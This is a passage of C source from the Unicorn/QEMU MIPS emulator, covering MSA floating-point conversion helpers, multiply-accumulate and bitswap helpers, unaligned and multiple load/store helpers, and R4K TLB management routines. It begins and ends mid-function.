&(env->active_fpu.fpr[ws].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { /* * Half precision floats come in two formats: standard * 
IEEE and "ARM" format. The latter gains extra exponent * range by omitting the NaN/Inf encodings. */ flag ieee = 1; MSA_FLOAT_BINOP(pwx->w[i], from_float16, Lh(pws, i), ieee, 32); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_UNOP(pwx->d[i], from_float32, Lw(pws, i), 64); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } void helper_msa_fexupr_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { /* * Half precision floats come in two formats: standard * IEEE and "ARM" format. The latter gains extra exponent * range by omitting the NaN/Inf encodings. */ flag ieee = 1; MSA_FLOAT_BINOP(pwx->w[i], from_float16, Rh(pws, i), ieee, 32); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_UNOP(pwx->d[i], from_float32, Rw(pws, i), 64); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } void helper_msa_ffql_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); uint32_t i; switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_UNOP(pwx->w[i], from_q16, Lh(pws, i), 32); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_UNOP(pwx->d[i], from_q32, Lw(pws, i), 64); } break; default: assert(0); } msa_move_v(pwd, pwx); } void helper_msa_ffqr_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); uint32_t i; switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_UNOP(pwx->w[i], from_q16, Rh(pws, i), 32); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_UNOP(pwx->d[i], from_q32, Rw(pws, i), 64); } break; default: assert(0); } msa_move_v(pwd, pwx); } void helper_msa_ftint_s_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_UNOP0(pwx->w[i], to_int32, pws->w[i], 32); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_UNOP0(pwx->d[i], to_int64, pws->d[i], 64); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } void helper_msa_ftint_u_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_UNOP0(pwx->w[i], to_uint32, pws->w[i], 32); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_UNOP0(pwx->d[i], to_uint64, pws->d[i], 64); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } #define float32_from_int32 int32_to_float32 #define float32_from_uint32 uint32_to_float32 #define float64_from_int64 int64_to_float64 #define float64_from_uint64 uint64_to_float64 void helper_msa_ffint_s_df(CPUMIPSState *env, uint32_t 
df, uint32_t wd, uint32_t ws) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_UNOP(pwx->w[i], from_int32, pws->w[i], 32); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_UNOP(pwx->d[i], from_int64, pws->d[i], 64); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } void helper_msa_ffint_u_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_UNOP(pwx->w[i], from_uint32, pws->w[i], 32); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_UNOP(pwx->d[i], from_uint64, pws->d[i], 64); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); }
unicorn-2.1.1/qemu/target/mips/op_helper.c
/* * MIPS emulation helpers for qemu. * * Copyright (c) 2004-2005 Jocelyn Mayer * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>.
* */ #include "qemu/osdep.h" #include "cpu.h" #include "internal.h" #include "qemu/host-utils.h" #include "exec/helper-proto.h" #include "exec/exec-all.h" #include "exec/cpu_ldst.h" #include "exec/memop.h" /*****************************************************************************/ /* Exceptions processing helpers */ void helper_raise_exception_err(CPUMIPSState *env, uint32_t exception, int error_code) { do_raise_exception_err(env, exception, error_code, 0); } void helper_raise_exception(CPUMIPSState *env, uint32_t exception) { do_raise_exception(env, exception, GETPC()); } void helper_raise_exception_debug(CPUMIPSState *env) { do_raise_exception(env, EXCP_DEBUG, 0); } static void raise_exception(CPUMIPSState *env, uint32_t exception) { do_raise_exception(env, exception, 0); } /* 64 bits arithmetic for 32 bits hosts */ static inline uint64_t get_HILO(CPUMIPSState *env) { return ((uint64_t)(env->active_tc.HI[0]) << 32) | (uint32_t)env->active_tc.LO[0]; } static inline target_ulong set_HIT0_LO(CPUMIPSState *env, uint64_t HILO) { env->active_tc.LO[0] = (int32_t)(HILO & 0xFFFFFFFF); return env->active_tc.HI[0] = (int32_t)(HILO >> 32); } static inline target_ulong set_HI_LOT0(CPUMIPSState *env, uint64_t HILO) { target_ulong tmp = env->active_tc.LO[0] = (int32_t)(HILO & 0xFFFFFFFF); env->active_tc.HI[0] = (int32_t)(HILO >> 32); return tmp; } /* Multiplication variants of the vr54xx. */ target_ulong helper_muls(CPUMIPSState *env, target_ulong arg1, target_ulong arg2) { return set_HI_LOT0(env, 0 - ((int64_t)(int32_t)arg1 * (int64_t)(int32_t)arg2)); } target_ulong helper_mulsu(CPUMIPSState *env, target_ulong arg1, target_ulong arg2) { return set_HI_LOT0(env, 0 - (uint64_t)(uint32_t)arg1 * (uint64_t)(uint32_t)arg2); } target_ulong helper_macc(CPUMIPSState *env, target_ulong arg1, target_ulong arg2) { return set_HI_LOT0(env, (int64_t)get_HILO(env) + (int64_t)(int32_t)arg1 * (int64_t)(int32_t)arg2); } target_ulong helper_macchi(CPUMIPSState *env, target_ulong arg1, target_ulong arg2) { return set_HIT0_LO(env, (int64_t)get_HILO(env) + (int64_t)(int32_t)arg1 * (int64_t)(int32_t)arg2); } target_ulong helper_maccu(CPUMIPSState *env, target_ulong arg1, target_ulong arg2) { return set_HI_LOT0(env, (uint64_t)get_HILO(env) + (uint64_t)(uint32_t)arg1 * (uint64_t)(uint32_t)arg2); } target_ulong helper_macchiu(CPUMIPSState *env, target_ulong arg1, target_ulong arg2) { return set_HIT0_LO(env, (uint64_t)get_HILO(env) + (uint64_t)(uint32_t)arg1 * (uint64_t)(uint32_t)arg2); } target_ulong helper_msac(CPUMIPSState *env, target_ulong arg1, target_ulong arg2) { return set_HI_LOT0(env, (int64_t)get_HILO(env) - (int64_t)(int32_t)arg1 * (int64_t)(int32_t)arg2); } target_ulong helper_msachi(CPUMIPSState *env, target_ulong arg1, target_ulong arg2) { return set_HIT0_LO(env, (int64_t)get_HILO(env) - (int64_t)(int32_t)arg1 * (int64_t)(int32_t)arg2); } target_ulong helper_msacu(CPUMIPSState *env, target_ulong arg1, target_ulong arg2) { return set_HI_LOT0(env, (uint64_t)get_HILO(env) - (uint64_t)(uint32_t)arg1 * (uint64_t)(uint32_t)arg2); } target_ulong helper_msachiu(CPUMIPSState *env, target_ulong arg1, target_ulong arg2) { return set_HIT0_LO(env, (uint64_t)get_HILO(env) - (uint64_t)(uint32_t)arg1 * (uint64_t)(uint32_t)arg2); } target_ulong helper_mulhi(CPUMIPSState *env, target_ulong arg1, target_ulong arg2) { return set_HIT0_LO(env, (int64_t)(int32_t)arg1 * (int64_t)(int32_t)arg2); } target_ulong helper_mulhiu(CPUMIPSState *env, target_ulong arg1, target_ulong arg2) { return set_HIT0_LO(env, (uint64_t)(uint32_t)arg1 * 
(uint64_t)(uint32_t)arg2); } target_ulong helper_mulshi(CPUMIPSState *env, target_ulong arg1, target_ulong arg2) { return set_HIT0_LO(env, 0 - (int64_t)(int32_t)arg1 * (int64_t)(int32_t)arg2); } target_ulong helper_mulshiu(CPUMIPSState *env, target_ulong arg1, target_ulong arg2) { return set_HIT0_LO(env, 0 - (uint64_t)(uint32_t)arg1 * (uint64_t)(uint32_t)arg2); } static inline target_ulong bitswap(target_ulong v) { v = ((v >> 1) & (target_ulong)0x5555555555555555ULL) | ((v & (target_ulong)0x5555555555555555ULL) << 1); v = ((v >> 2) & (target_ulong)0x3333333333333333ULL) | ((v & (target_ulong)0x3333333333333333ULL) << 2); v = ((v >> 4) & (target_ulong)0x0F0F0F0F0F0F0F0FULL) | ((v & (target_ulong)0x0F0F0F0F0F0F0F0FULL) << 4); return v; } #ifdef TARGET_MIPS64 target_ulong helper_dbitswap(target_ulong rt) { return bitswap(rt); } #endif target_ulong helper_bitswap(target_ulong rt) { return (int32_t)bitswap(rt); } target_ulong helper_rotx(target_ulong rs, uint32_t shift, uint32_t shiftx, uint32_t stripe) { int i; uint64_t tmp0 = ((uint64_t)rs) << 32 | ((uint64_t)rs & 0xffffffff); uint64_t tmp1 = tmp0; for (i = 0; i <= 46; i++) { int s; if (i & 0x8) { s = shift; } else { s = shiftx; } if (stripe != 0 && !(i & 0x4)) { s = ~s; } if (s & 0x10) { if (tmp0 & (1LL << (i + 16))) { tmp1 |= 1LL << i; } else { tmp1 &= ~(1LL << i); } } } uint64_t tmp2 = tmp1; for (i = 0; i <= 38; i++) { int s; if (i & 0x4) { s = shift; } else { s = shiftx; } if (s & 0x8) { if (tmp1 & (1LL << (i + 8))) { tmp2 |= 1LL << i; } else { tmp2 &= ~(1LL << i); } } } uint64_t tmp3 = tmp2; for (i = 0; i <= 34; i++) { int s; if (i & 0x2) { s = shift; } else { s = shiftx; } if (s & 0x4) { if (tmp2 & (1LL << (i + 4))) { tmp3 |= 1LL << i; } else { tmp3 &= ~(1LL << i); } } } uint64_t tmp4 = tmp3; for (i = 0; i <= 32; i++) { int s; if (i & 0x1) { s = shift; } else { s = shiftx; } if (s & 0x2) { if (tmp3 & (1LL << (i + 2))) { tmp4 |= 1LL << i; } else { tmp4 &= ~(1LL << i); } } } uint64_t tmp5 = tmp4; for (i = 0; i <= 31; i++) { int s; s = shift; if (s & 0x1) { if (tmp4 & (1LL << (i + 1))) { tmp5 |= 1LL << i; } else { tmp5 &= ~(1LL << i); } } } return (int64_t)(int32_t)(uint32_t)tmp5; } static inline hwaddr do_translate_address(CPUMIPSState *env, target_ulong address, int rw, uintptr_t retaddr) { hwaddr paddr; CPUState *cs = env_cpu(env); paddr = cpu_mips_translate_address(env, address, rw); if (paddr == -1LL) { cpu_loop_exit_restore(cs, retaddr); } else { return paddr; } } #define HELPER_LD_ATOMIC(name, insn, almask, do_cast) \ target_ulong helper_##name(CPUMIPSState *env, target_ulong arg, int mem_idx) \ { \ if (arg & almask) { \ if (!(env->hflags & MIPS_HFLAG_DM)) { \ env->CP0_BadVAddr = arg; \ } \ do_raise_exception(env, EXCP_AdEL, GETPC()); \ } \ env->CP0_LLAddr = do_translate_address(env, arg, 0, GETPC()); \ env->lladdr = arg; \ env->llval = do_cast cpu_##insn##_mmuidx_ra(env, arg, mem_idx, GETPC()); \ return env->llval; \ } HELPER_LD_ATOMIC(ll, ldl, 0x3, (target_long)(int32_t)) #ifdef TARGET_MIPS64 HELPER_LD_ATOMIC(lld, ldq, 0x7, (target_ulong)) #endif #undef HELPER_LD_ATOMIC #ifdef TARGET_WORDS_BIGENDIAN #define GET_LMASK(v) ((v) & 3) #define GET_OFFSET(addr, offset) (addr + (offset)) #else #define GET_LMASK(v) (((v) & 3) ^ 3) #define GET_OFFSET(addr, offset) (addr - (offset)) #endif void helper_swl(CPUMIPSState *env, target_ulong arg1, target_ulong arg2, int mem_idx) { cpu_stb_mmuidx_ra(env, arg2, (uint8_t)(arg1 >> 24), mem_idx, GETPC()); if (GET_LMASK(arg2) <= 2) { cpu_stb_mmuidx_ra(env, GET_OFFSET(arg2, 1), (uint8_t)(arg1 >> 16), 
mem_idx, GETPC()); } if (GET_LMASK(arg2) <= 1) { cpu_stb_mmuidx_ra(env, GET_OFFSET(arg2, 2), (uint8_t)(arg1 >> 8), mem_idx, GETPC()); } if (GET_LMASK(arg2) == 0) { cpu_stb_mmuidx_ra(env, GET_OFFSET(arg2, 3), (uint8_t)arg1, mem_idx, GETPC()); } } void helper_swr(CPUMIPSState *env, target_ulong arg1, target_ulong arg2, int mem_idx) { cpu_stb_mmuidx_ra(env, arg2, (uint8_t)arg1, mem_idx, GETPC()); if (GET_LMASK(arg2) >= 1) { cpu_stb_mmuidx_ra(env, GET_OFFSET(arg2, -1), (uint8_t)(arg1 >> 8), mem_idx, GETPC()); } if (GET_LMASK(arg2) >= 2) { cpu_stb_mmuidx_ra(env, GET_OFFSET(arg2, -2), (uint8_t)(arg1 >> 16), mem_idx, GETPC()); } if (GET_LMASK(arg2) == 3) { cpu_stb_mmuidx_ra(env, GET_OFFSET(arg2, -3), (uint8_t)(arg1 >> 24), mem_idx, GETPC()); } } #if defined(TARGET_MIPS64) /* * "half" load and stores. We must do the memory access inline, * or fault handling won't work. */ #ifdef TARGET_WORDS_BIGENDIAN #define GET_LMASK64(v) ((v) & 7) #else #define GET_LMASK64(v) (((v) & 7) ^ 7) #endif void helper_sdl(CPUMIPSState *env, target_ulong arg1, target_ulong arg2, int mem_idx) { cpu_stb_mmuidx_ra(env, arg2, (uint8_t)(arg1 >> 56), mem_idx, GETPC()); if (GET_LMASK64(arg2) <= 6) { cpu_stb_mmuidx_ra(env, GET_OFFSET(arg2, 1), (uint8_t)(arg1 >> 48), mem_idx, GETPC()); } if (GET_LMASK64(arg2) <= 5) { cpu_stb_mmuidx_ra(env, GET_OFFSET(arg2, 2), (uint8_t)(arg1 >> 40), mem_idx, GETPC()); } if (GET_LMASK64(arg2) <= 4) { cpu_stb_mmuidx_ra(env, GET_OFFSET(arg2, 3), (uint8_t)(arg1 >> 32), mem_idx, GETPC()); } if (GET_LMASK64(arg2) <= 3) { cpu_stb_mmuidx_ra(env, GET_OFFSET(arg2, 4), (uint8_t)(arg1 >> 24), mem_idx, GETPC()); } if (GET_LMASK64(arg2) <= 2) { cpu_stb_mmuidx_ra(env, GET_OFFSET(arg2, 5), (uint8_t)(arg1 >> 16), mem_idx, GETPC()); } if (GET_LMASK64(arg2) <= 1) { cpu_stb_mmuidx_ra(env, GET_OFFSET(arg2, 6), (uint8_t)(arg1 >> 8), mem_idx, GETPC()); } if (GET_LMASK64(arg2) <= 0) { cpu_stb_mmuidx_ra(env, GET_OFFSET(arg2, 7), (uint8_t)arg1, mem_idx, GETPC()); } } void helper_sdr(CPUMIPSState *env, target_ulong arg1, target_ulong arg2, int mem_idx) { cpu_stb_mmuidx_ra(env, arg2, (uint8_t)arg1, mem_idx, GETPC()); if (GET_LMASK64(arg2) >= 1) { cpu_stb_mmuidx_ra(env, GET_OFFSET(arg2, -1), (uint8_t)(arg1 >> 8), mem_idx, GETPC()); } if (GET_LMASK64(arg2) >= 2) { cpu_stb_mmuidx_ra(env, GET_OFFSET(arg2, -2), (uint8_t)(arg1 >> 16), mem_idx, GETPC()); } if (GET_LMASK64(arg2) >= 3) { cpu_stb_mmuidx_ra(env, GET_OFFSET(arg2, -3), (uint8_t)(arg1 >> 24), mem_idx, GETPC()); } if (GET_LMASK64(arg2) >= 4) { cpu_stb_mmuidx_ra(env, GET_OFFSET(arg2, -4), (uint8_t)(arg1 >> 32), mem_idx, GETPC()); } if (GET_LMASK64(arg2) >= 5) { cpu_stb_mmuidx_ra(env, GET_OFFSET(arg2, -5), (uint8_t)(arg1 >> 40), mem_idx, GETPC()); } if (GET_LMASK64(arg2) >= 6) { cpu_stb_mmuidx_ra(env, GET_OFFSET(arg2, -6), (uint8_t)(arg1 >> 48), mem_idx, GETPC()); } if (GET_LMASK64(arg2) == 7) { cpu_stb_mmuidx_ra(env, GET_OFFSET(arg2, -7), (uint8_t)(arg1 >> 56), mem_idx, GETPC()); } } #endif /* TARGET_MIPS64 */ static const int multiple_regs[] = { 16, 17, 18, 19, 20, 21, 22, 23, 30 }; void helper_lwm(CPUMIPSState *env, target_ulong addr, target_ulong reglist, uint32_t mem_idx) { target_ulong base_reglist = reglist & 0xf; target_ulong do_r31 = reglist & 0x10; if (base_reglist > 0 && base_reglist <= ARRAY_SIZE(multiple_regs)) { target_ulong i; for (i = 0; i < base_reglist; i++) { env->active_tc.gpr[multiple_regs[i]] = (target_long)cpu_ldl_mmuidx_ra(env, addr, mem_idx, GETPC()); addr += 4; } } if (do_r31) { env->active_tc.gpr[31] = (target_long)cpu_ldl_mmuidx_ra(env, addr, 
mem_idx, GETPC()); } } void helper_swm(CPUMIPSState *env, target_ulong addr, target_ulong reglist, uint32_t mem_idx) { target_ulong base_reglist = reglist & 0xf; target_ulong do_r31 = reglist & 0x10; if (base_reglist > 0 && base_reglist <= ARRAY_SIZE(multiple_regs)) { target_ulong i; for (i = 0; i < base_reglist; i++) { /* SWM stores full 32-bit words (addr advances by 4), matching the cpu_ldl load in helper_lwm. */ cpu_stl_mmuidx_ra(env, addr, env->active_tc.gpr[multiple_regs[i]], mem_idx, GETPC()); addr += 4; } } if (do_r31) { cpu_stl_mmuidx_ra(env, addr, env->active_tc.gpr[31], mem_idx, GETPC()); } } #if defined(TARGET_MIPS64) void helper_ldm(CPUMIPSState *env, target_ulong addr, target_ulong reglist, uint32_t mem_idx) { target_ulong base_reglist = reglist & 0xf; target_ulong do_r31 = reglist & 0x10; if (base_reglist > 0 && base_reglist <= ARRAY_SIZE(multiple_regs)) { target_ulong i; for (i = 0; i < base_reglist; i++) { env->active_tc.gpr[multiple_regs[i]] = cpu_ldq_mmuidx_ra(env, addr, mem_idx, GETPC()); addr += 8; } } if (do_r31) { env->active_tc.gpr[31] = cpu_ldq_mmuidx_ra(env, addr, mem_idx, GETPC()); } } void helper_sdm(CPUMIPSState *env, target_ulong addr, target_ulong reglist, uint32_t mem_idx) { target_ulong base_reglist = reglist & 0xf; target_ulong do_r31 = reglist & 0x10; if (base_reglist > 0 && base_reglist <= ARRAY_SIZE(multiple_regs)) { target_ulong i; for (i = 0; i < base_reglist; i++) { cpu_stq_mmuidx_ra(env, addr, env->active_tc.gpr[multiple_regs[i]], mem_idx, GETPC()); addr += 8; } } if (do_r31) { cpu_stq_mmuidx_ra(env, addr, env->active_tc.gpr[31], mem_idx, GETPC()); } } #endif void helper_fork(target_ulong arg1, target_ulong arg2) { /* * arg1 = rt, arg2 = rs * TODO: store to TC register */ } target_ulong helper_yield(CPUMIPSState *env, target_ulong arg) { target_long arg1 = arg; if (arg1 < 0) { /* No scheduling policy implemented. */ if (arg1 != -2) { if (env->CP0_VPEControl & (1 << CP0VPECo_YSI) && env->active_tc.CP0_TCStatus & (1 << CP0TCSt_DT)) { env->CP0_VPEControl &= ~(0x7 << CP0VPECo_EXCPT); env->CP0_VPEControl |= 4 << CP0VPECo_EXCPT; do_raise_exception(env, EXCP_THREAD, GETPC()); } } } else if (arg1 == 0) { if (0) { /* TODO: TC underflow */ env->CP0_VPEControl &= ~(0x7 << CP0VPECo_EXCPT); do_raise_exception(env, EXCP_THREAD, GETPC()); } else { /* TODO: Deallocate TC */ } } else if (arg1 > 0) { /* Yield qualifier inputs not implemented. */ env->CP0_VPEControl &= ~(0x7 << CP0VPECo_EXCPT); env->CP0_VPEControl |= 2 << CP0VPECo_EXCPT; do_raise_exception(env, EXCP_THREAD, GETPC()); } return env->CP0_YQMask; } /* TLB management */ static void r4k_mips_tlb_flush_extra(CPUMIPSState *env, int first) { /* Discard entries from env->tlb[first] onwards.
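Each discarded entry goes through r4k_invalidate_tlb(), which also drops any translation QEMU has cached for it.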
*/ while (env->tlb->tlb_in_use > first) { r4k_invalidate_tlb(env, --env->tlb->tlb_in_use, 0); } } static inline uint64_t get_tlb_pfn_from_entrylo(uint64_t entrylo) { #if defined(TARGET_MIPS64) return extract64(entrylo, 6, 54); #else return extract64(entrylo, 6, 24) | /* PFN */ (extract64(entrylo, 32, 32) << 24); /* PFNX */ #endif } static void r4k_fill_tlb(CPUMIPSState *env, int idx) { r4k_tlb_t *tlb; uint64_t mask = env->CP0_PageMask >> (TARGET_PAGE_BITS + 1); /* XXX: detect conflicting TLBs and raise a MCHECK exception when needed */ tlb = &env->tlb->mmu.r4k.tlb[idx]; if (env->CP0_EntryHi & (1 << CP0EnHi_EHINV)) { tlb->EHINV = 1; return; } tlb->EHINV = 0; tlb->VPN = env->CP0_EntryHi & (TARGET_PAGE_MASK << 1); #if defined(TARGET_MIPS64) tlb->VPN &= env->SEGMask; #endif tlb->ASID = env->CP0_EntryHi & env->CP0_EntryHi_ASID_mask; tlb->MMID = env->CP0_MemoryMapID; tlb->PageMask = env->CP0_PageMask; tlb->G = env->CP0_EntryLo0 & env->CP0_EntryLo1 & 1; tlb->V0 = (env->CP0_EntryLo0 & 2) != 0; tlb->D0 = (env->CP0_EntryLo0 & 4) != 0; tlb->C0 = (env->CP0_EntryLo0 >> 3) & 0x7; tlb->XI0 = (env->CP0_EntryLo0 >> CP0EnLo_XI) & 1; tlb->RI0 = (env->CP0_EntryLo0 >> CP0EnLo_RI) & 1; tlb->PFN[0] = (get_tlb_pfn_from_entrylo(env->CP0_EntryLo0) & ~mask) << 12; tlb->V1 = (env->CP0_EntryLo1 & 2) != 0; tlb->D1 = (env->CP0_EntryLo1 & 4) != 0; tlb->C1 = (env->CP0_EntryLo1 >> 3) & 0x7; tlb->XI1 = (env->CP0_EntryLo1 >> CP0EnLo_XI) & 1; tlb->RI1 = (env->CP0_EntryLo1 >> CP0EnLo_RI) & 1; tlb->PFN[1] = (get_tlb_pfn_from_entrylo(env->CP0_EntryLo1) & ~mask) << 12; } void r4k_helper_tlbinv(CPUMIPSState *env) { bool mi = !!((env->CP0_Config5 >> CP0C5_MI) & 1); uint16_t ASID = env->CP0_EntryHi & env->CP0_EntryHi_ASID_mask; uint32_t MMID = env->CP0_MemoryMapID; uint32_t tlb_mmid; r4k_tlb_t *tlb; int idx; MMID = mi ? MMID : (uint32_t) ASID; for (idx = 0; idx < env->tlb->nb_tlb; idx++) { tlb = &env->tlb->mmu.r4k.tlb[idx]; tlb_mmid = mi ? tlb->MMID : (uint32_t) tlb->ASID; if (!tlb->G && tlb_mmid == MMID) { tlb->EHINV = 1; } } cpu_mips_tlb_flush(env); } void r4k_helper_tlbinvf(CPUMIPSState *env) { int idx; for (idx = 0; idx < env->tlb->nb_tlb; idx++) { env->tlb->mmu.r4k.tlb[idx].EHINV = 1; } cpu_mips_tlb_flush(env); } void r4k_helper_tlbwi(CPUMIPSState *env) { bool mi = !!((env->CP0_Config5 >> CP0C5_MI) & 1); target_ulong VPN; uint16_t ASID = env->CP0_EntryHi & env->CP0_EntryHi_ASID_mask; uint32_t MMID = env->CP0_MemoryMapID; uint32_t tlb_mmid; bool EHINV, G, V0, D0, V1, D1, XI0, XI1, RI0, RI1; r4k_tlb_t *tlb; int idx; MMID = mi ? MMID : (uint32_t) ASID; idx = (env->CP0_Index & ~0x80000000) % env->tlb->nb_tlb; tlb = &env->tlb->mmu.r4k.tlb[idx]; VPN = env->CP0_EntryHi & (TARGET_PAGE_MASK << 1); #if defined(TARGET_MIPS64) VPN &= env->SEGMask; #endif EHINV = (env->CP0_EntryHi & (1 << CP0EnHi_EHINV)) != 0; G = env->CP0_EntryLo0 & env->CP0_EntryLo1 & 1; V0 = (env->CP0_EntryLo0 & 2) != 0; D0 = (env->CP0_EntryLo0 & 4) != 0; XI0 = (env->CP0_EntryLo0 >> CP0EnLo_XI) &1; RI0 = (env->CP0_EntryLo0 >> CP0EnLo_RI) &1; V1 = (env->CP0_EntryLo1 & 2) != 0; D1 = (env->CP0_EntryLo1 & 4) != 0; XI1 = (env->CP0_EntryLo1 >> CP0EnLo_XI) &1; RI1 = (env->CP0_EntryLo1 >> CP0EnLo_RI) &1; tlb_mmid = mi ? tlb->MMID : (uint32_t) tlb->ASID; /* * Discard cached TLB entries, unless tlbwi is just upgrading access * permissions on the current entry. 
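* A pure permission upgrade (making the entry valid or dirty again, or clearing * XI/RI) cannot leave a stale cached translation behind, so the costly flush * below is only taken when a field is downgraded or the mapping itself changes.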
*/ if (tlb->VPN != VPN || tlb_mmid != MMID || tlb->G != G || (!tlb->EHINV && EHINV) || (tlb->V0 && !V0) || (tlb->D0 && !D0) || (!tlb->XI0 && XI0) || (!tlb->RI0 && RI0) || (tlb->V1 && !V1) || (tlb->D1 && !D1) || (!tlb->XI1 && XI1) || (!tlb->RI1 && RI1)) { r4k_mips_tlb_flush_extra(env, env->tlb->nb_tlb); } r4k_invalidate_tlb(env, idx, 0); r4k_fill_tlb(env, idx); } void r4k_helper_tlbwr(CPUMIPSState *env) { int r = cpu_mips_get_random(env); r4k_invalidate_tlb(env, r, 1); r4k_fill_tlb(env, r); } void r4k_helper_tlbp(CPUMIPSState *env) { bool mi = !!((env->CP0_Config5 >> CP0C5_MI) & 1); r4k_tlb_t *tlb; target_ulong mask; target_ulong tag; target_ulong VPN; uint16_t ASID = env->CP0_EntryHi & env->CP0_EntryHi_ASID_mask; uint32_t MMID = env->CP0_MemoryMapID; uint32_t tlb_mmid; int i; MMID = mi ? MMID : (uint32_t) ASID; for (i = 0; i < env->tlb->nb_tlb; i++) { tlb = &env->tlb->mmu.r4k.tlb[i]; /* 1k pages are not supported. */ mask = tlb->PageMask | ~(TARGET_PAGE_MASK << 1); tag = env->CP0_EntryHi & ~mask; VPN = tlb->VPN & ~mask; #if defined(TARGET_MIPS64) tag &= env->SEGMask; #endif tlb_mmid = mi ? tlb->MMID : (uint32_t) tlb->ASID; /* Check ASID/MMID, virtual page number & size */ if ((tlb->G == 1 || tlb_mmid == MMID) && VPN == tag && !tlb->EHINV) { /* TLB match */ env->CP0_Index = i; break; } } if (i == env->tlb->nb_tlb) { /* No match. Discard any shadow entries, if any of them match. */ for (i = env->tlb->nb_tlb; i < env->tlb->tlb_in_use; i++) { tlb = &env->tlb->mmu.r4k.tlb[i]; /* 1k pages are not supported. */ mask = tlb->PageMask | ~(TARGET_PAGE_MASK << 1); tag = env->CP0_EntryHi & ~mask; VPN = tlb->VPN & ~mask; #if defined(TARGET_MIPS64) tag &= env->SEGMask; #endif tlb_mmid = mi ? tlb->MMID : (uint32_t) tlb->ASID; /* Check ASID/MMID, virtual page number & size */ if ((tlb->G == 1 || tlb_mmid == MMID) && VPN == tag) { r4k_mips_tlb_flush_extra(env, i); break; } } env->CP0_Index |= 0x80000000; } } static inline uint64_t get_entrylo_pfn_from_tlb(uint64_t tlb_pfn) { #if defined(TARGET_MIPS64) return tlb_pfn << 6; #else return (extract64(tlb_pfn, 0, 24) << 6) | /* PFN */ (extract64(tlb_pfn, 24, 32) << 32); /* PFNX */ #endif } void r4k_helper_tlbr(CPUMIPSState *env) { bool mi = !!((env->CP0_Config5 >> CP0C5_MI) & 1); uint16_t ASID = env->CP0_EntryHi & env->CP0_EntryHi_ASID_mask; uint32_t MMID = env->CP0_MemoryMapID; uint32_t tlb_mmid; r4k_tlb_t *tlb; int idx; MMID = mi ? MMID : (uint32_t) ASID; idx = (env->CP0_Index & ~0x80000000) % env->tlb->nb_tlb; tlb = &env->tlb->mmu.r4k.tlb[idx]; tlb_mmid = mi ? tlb->MMID : (uint32_t) tlb->ASID; /* If this will change the current ASID/MMID, flush qemu's TLB. */ if (MMID != tlb_mmid) { 